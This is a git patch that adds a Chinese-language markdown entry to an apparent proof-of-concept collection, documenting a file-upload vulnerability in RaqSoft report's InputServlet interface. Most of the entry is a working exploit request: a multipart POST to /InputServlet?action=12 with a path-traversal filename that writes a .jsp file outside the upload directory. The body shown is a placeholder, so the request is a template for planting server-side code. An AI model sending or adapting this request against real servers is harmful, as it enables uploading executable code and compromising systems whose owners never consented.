From ce9b57aeec914d19653e36973138a8a73cf6df34 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Mon, 8 Apr 2024 09:41:06 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E6=B6=A6=E4=B9=BE=E6=8A=A5=E8=A1=A8In?=
 =?UTF-8?q?putServlet=E6=8E=A5=E5=8F=A3=E5=AD=98=E5=9C=A8=E6=96=87?=
 =?UTF-8?q?=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 润乾报表InputServlet接口存在文件上传漏洞.md | 32 +++++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 润乾报表InputServlet接口存在文件上传漏洞.md

diff --git a/润乾报表InputServlet接口存在文件上传漏洞.md b/润乾报表InputServlet接口存在文件上传漏洞.md
new file mode 100644
index 0000000..151fd3e
--- /dev/null
+++ b/润乾报表InputServlet接口存在文件上传漏洞.md
@@ -0,0 +1,32 @@
+## 润乾报表InputServlet接口存在文件上传漏洞
+
+环境：https://github.com/charlesvhe/raqsoft
+
+## poc
+```
+POST /InputServlet?action=12 HTTP/1.1
+Host: 127.0.0.1:8080
+Content-Type: multipart/form-data; boundary=--------------------------170005680039721412137562
+Accept-Encoding: gzip, deflate, br
+Content-Length: 2401
+
+----------------------------170005680039721412137562
+Content-Disposition: form-data; name="upsize"
+
+1024
+----------------------------170005680039721412137562
+Content-Disposition: form-data; name="file"; filename="/\..\\..\2.jsp"
+Content-Type: image/png
+
+11111
+----------------------------170005680039721412137562--
+
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/040e8f76-a72c-47db-a161-d14cab5db001)
+
+![image](https://github.com/wy876/POC/assets/139549762/bea567d7-6648-4cbe-990a-8fbb876d7660)
+
+
+## 漏洞来源
+- https://mp.weixin.qq.com/s/-u1fn_q4e-YhJUEqwNG1Zg